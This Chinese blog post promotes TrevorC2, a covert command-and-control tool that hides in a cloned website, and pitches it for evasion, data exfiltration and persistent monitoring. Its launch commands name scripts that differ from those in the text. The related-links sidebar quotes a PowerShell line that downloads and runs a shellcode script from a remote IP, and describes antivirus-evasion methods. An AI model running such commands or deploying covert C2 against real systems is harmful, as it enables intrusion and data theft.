推荐项目:TrevorC2 - 隐藏在HTTP下的合法行为命令与控制框架

于 2024-05-14 10:05:51 发布
阅读量355 收藏 3
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00094/article/details/138842557
版权

推荐项目:TrevorC2 - 隐藏在HTTP下的合法行为命令与控制框架

TrevorC2是一个创新的客户端-服务器模型,巧妙地将命令与控制系统隐藏于正常可浏览的网站之下,大大增加了检测的难度。该项目由安全专家Dave Kennedy创建,并在持续改进中。

项目介绍

TrevorC2的设计思路是通过伪装成一个普通网站来掩盖其真正目的,即在不使用POST请求数据传输的情况下,以非同步的方式执行命令和数据回传。它包括两个组件:客户端和服务器。客户端可以配置为任何你想要的语言,如Python、C#或PowerShell。目前的trevorc2_client.py支持Windows、MacOS和Linux系统。服务器端会克隆你指定的网站,然后在这个看似正常的网站源码中嵌入特定参数,等待客户端查找并执行命令。

项目技术分析

  1. 服务器端:使用trevorc2_server.py设置,可以根据需求自定义要克隆的网站地址以及隐藏指令的位置。服务器端可以被任何人浏览,而不会引起怀疑。
  2. 客户端trevorc2_client.pytrevorc2_client.ps1负责从服务器获取指令并执行,再把结果以Base64编码的形式回传至查询字符串参数。这个过程简单且难以追踪。
  3. 会话管理:TrevorC2能处理来自不同主机的多会话,通过交互式界面可以轻松管理和切换这些会话。

应用场景

  • 红队操作:在渗透测试中,隐蔽的C2通信通道有助于避免检测。
  • 敏感信息传输:在需要隐秘性的情景下,例如从内部网络传出数据,或对目标进行持久监控。

项目特点

  • 低检测率:通过随机的时间间隔和不使用常规的数据传输方式减少被发现的风险。
  • 跨平台:客户端支持Windows、MacOS和Linux系统。
  • 灵活配置:可自定义网站克隆、参数位置和加密密钥等,增强伪装效果。
  • 多会话管理:能够轻松管理和切换多个活动会话。
  • Docker部署:提供Dockerfile,方便在云环境中快速部署。

现在就下载TrevorC2,体验这款强大的隐蔽C2工具吧!为你的红队行动增添一抹神秘色彩。点击这里访问项目GitHub页面,开始你的旅程。

# 安装依赖
pip install -r requirements.txt

# 使用示例
python trevor2_server.py
python trevor2_client.py 或 .\trevor2_client.ps1

注:在实际使用时,请确保遵循所有适用法律和道德规范。

毛彤影
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1150
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode。
十三、权限维持
谢小二的博客
06-12 1314
权限维持
【基础篇】————17、隐匿攻击之Website
Fly_鹏程万里
05-26 630
通过合法流量覆盖任意命令是每个红队入侵的必要条件。大多数命令控制工具正在实施一种秘密技术,它允许红队隐藏他们的活动,因为数据泄露是目标的一部分。 David Kennedy开发了一个名为TrevorC2命令控制工具,可用于通过合法HTTP流量执行命令。需要将trevorc2_server.py上的URL属性修改为所选的网站。 ...
TrevorC2是一个合法的网站,在客户端和服务端之间架设通信通道,用于隐蔽的命令执行-python
06-18
TrevorC2是一个合法的网站(可浏览),在客户端和服务端之间架设通信通道,用于隐蔽的命令执行 trevorc2 TrevorC2 - 通过 HTTP 上的合法行为进行命令控制 作者:Dave Kennedy (@HackingDave) 网站:https://www.trustedsec.com 请注意,这是一个非常早的版本 - 很快就会添加大量随机化和加密。 TrevorC2 是一种客户端/服务器模型,用于通过通常可浏览的网站屏蔽命令控制。 由于时间间隔不同并且不使用 POST 请求进行数据传输,因此检测变得更加困难。 ,.'''''。 ... ''''', .' ',' ,.MMMM;.;' '。 ;; ;MMMMMMMM; ;;' :'M: ;MMMMMMMMMM;. :M': : M: MMMMMMMMMMMMM: :M 。 .' M: MMMMMMMMMMMMM: :M。 ; ; :M' :MMMMMMMMMMMM' 'M: : :M: .;"MMMMMMMMM":;. ,M: : : ::,MMM;.M":::M.;MMM ::'
Python-TrevorC2是一个合法的网站在客户端和服务端之间架设通信通道用于隐蔽的命令执行
08-10
TrevorC2是一个合法的网站(可浏览),在客户端和服务端之间架设通信通道,用于隐蔽的命令执行
trevorc2:TrevorC2合法的网站(可浏览),可通过隧道传输客户端服务器通信以执行隐蔽命令
04-06
特雷弗2 TrevorC2-通过HTTP合法行为进行命令控制 撰写者:戴夫·肯尼迪(@HackingDave)网站: ://www.trustedsec.com 请注意,这是一个非常早的发行版-即将添加大量随机化和加密功能。 TrevorC2是一种客户端/服务器模型,用于通过通常可浏览的网站屏蔽命令控制。 随着时间间隔的不同,检测变得更加困难,并且不使用POST请求进行数据提取。 , .'''''. ... ''''', .' ',' ,.MMMM;.;' '. ;; ;MMMMMMMMM; ;;' :'M: ;MMMMMMMMMMM;. :M': :
渗透测试入门19之渗透测试工具2
鹿鸣天涯
04-17 2593
适用于渗透测试不同阶段的工具收集整理 内容 侦察 武器化 交货 命令控制 横向运动 建立立足点 升级特权 数据泄露 杂项 参考 该资源清单列表涵盖了一系列,适用于渗透测试不同阶段的开源/商业工具。如果你想为此列表添加贡献,欢迎你向我发送pull request。 侦察 主动情报收集 EyeWitness:可用于网站截图,以及提供一些服务器头信息,并在可能的情况下识...
渗透测试不同阶段的开源/商业工具
sunny_r8的博客
06-09 880
该资源清单列表涵盖了一系列,适用于渗透测试不同阶段的开源/商业工具。 侦察 主动情报收集 EyeWitness:可用于网站截图,以及提供一些服务器头信息,并在可能的情况下识别默认凭据。https://github.com/ChrisTruncer/EyeWitness AWSBucketDump:AWS S3安全扫描工具,允许你快速枚举AWS S3 buckets以查找有趣或机密的文件。https://github.com/jordanpotti/AWSBucketDump AQUATONE:子域名枚举探测
适用于渗透测试不同阶段的工具收集整理
ts719796895的博客
02-04 1447
该资源清单列表涵盖了一系列,适用于渗透测试不同阶段的开源/商业工具。 侦察 主动情报收集 EyeWitness:可用于网站截图,以及提供一些服务器头信息,并在可能的情况下识别默认凭据。https://github.com/ChrisTruncer/EyeWitness AWSBucketDump:AWS S3安全扫描工具,允许你快速枚举AWS S3 buckets以查找有趣或机密的文...
适用于***测试不同阶段的工具收集整理
weixin_34406086的博客
12-16 539
侦察主动情报收集 EyeWitness:可用于网站截图,以及提供一些服务器头信息,并在可能的情况下识别默认凭据。https://github.com/ChrisTruncer/EyeWitness AWSBucketDump:AWS S3安全扫描工具,允许你快速枚举AWS S3 buckets以查找有趣或机密的文件。https://github.com/jordanpotti/AWSBucketD...
SPEC CPU2006的执行命令
热门推荐
并行时代
03-03 1万+
The execution command options for SPEC CPU2006 C/C++ benchmark. 另外也有针对每个程序的Makefile,如果需要可以给我发邮件。 1) 400.perlbench runspec --config linux-amd64-gcc470.cfg -T base -i test --noreportable 400.perlb
Red Team远程控制软件
weixin_30872337的博客
08-30 1102
开源远程管理控制 https://github.com/malwaredllc/byob 僵尸网络生成框架 https://github.com/panda-re/lava 大规模向程序中植入恶意程序 https://github.com/proxycannon/proxycannon-ng 构建攻击僵尸网络 https://github.com/deadPix3l/CryptSky/...
红队武器库-网络安全人员必备
anquanzushiye的博客
02-20 5454
包含内容:侦察武器化投递命令控制横向移动建立立足点提权数据传输杂项内容很不错,建议转发朋友圈作为存档。侦察主动情报收集EyeWitnessis designed to take sc...
APT攻防整理-攻击方法/工具
weixin_30865427的博客
08-01 902
攻击步骤 一般步骤 社工 武器制造 武器投递 漏洞利用 ...
【基础篇】————20、隐匿攻击之Images
Fly_鹏程万里
05-26 568
迈克尔·斯科特开发了一个python脚本,可以生成一个图标图像,并将PowerShell命令嵌入到该图像中。第一步是将命令写入文本文件。 echo 'IEX((new-object net.webclient).downloadstring("http://192.168.1.171/tmp/Invoke-Shellcode.ps1"));Invoke-Shellcode -payload ...
通用的C++数据结构代码实现,使用模板
08-26
通用的C++数据结构代码实现,使用模板
ant-design-vue-1.2.2.zip
08-26
基于 Ant Design 和 Vue 的企业级 UI 组件库
基于Django完成一个企业级的官方网站的制作.zip
最新发布
08-26
基于Django完成一个企业级的官方网站的制作.zip
springboot364高校科研信息管理系统pf.zip
08-26
信息数据从传统到当代,是一直在变革当中,突如其来的互联网让传统的信息管理看到了革命性的曙光,因为传统信息管理从时效性,还是安全性,还是可操作性等各个方面来讲,遇到了互联网时代才发现能补上自古以来的短板,有效的提升管理的效率和业务水平。传统的管理模式,时间越久管理的内容越多,也需要更多的人来对数据进行整理,并且数据的汇总查询方面效率也是极其的低下,并且数据安全方面永远不会保证安全性能。结合数据内容管理的种种缺点,在互联网时代都可以得到有效的补充。结合先进的互联网技术,开发符合需求的软件,让数据内容管理不管是从录入的及时性,查看的及时性还是汇总分析的及时性,都能让正确率达到最高,管理更加的科学和便捷。本次开发的高校科研信息管理系统实现了操作日志管理、字典管理、反馈管理、公告管理、科研成果管理、科研项目管理、通知管理、学术活动管理、学院部门管理、科研人员管理、管理员管理等功能。系统用到了关系型数据库中王者MySql作为系统的数据库,有效的对数据进行安全的存储,有效的备份,对数据可靠性方面得到了保证。并且程序也具备程序需求的所有功能,使得操作性还是安全性都大大提高,让高校科研信息管理系统更能从理念走到现实,确确实实的让人们提升信息处理效率。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

毛彤影

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值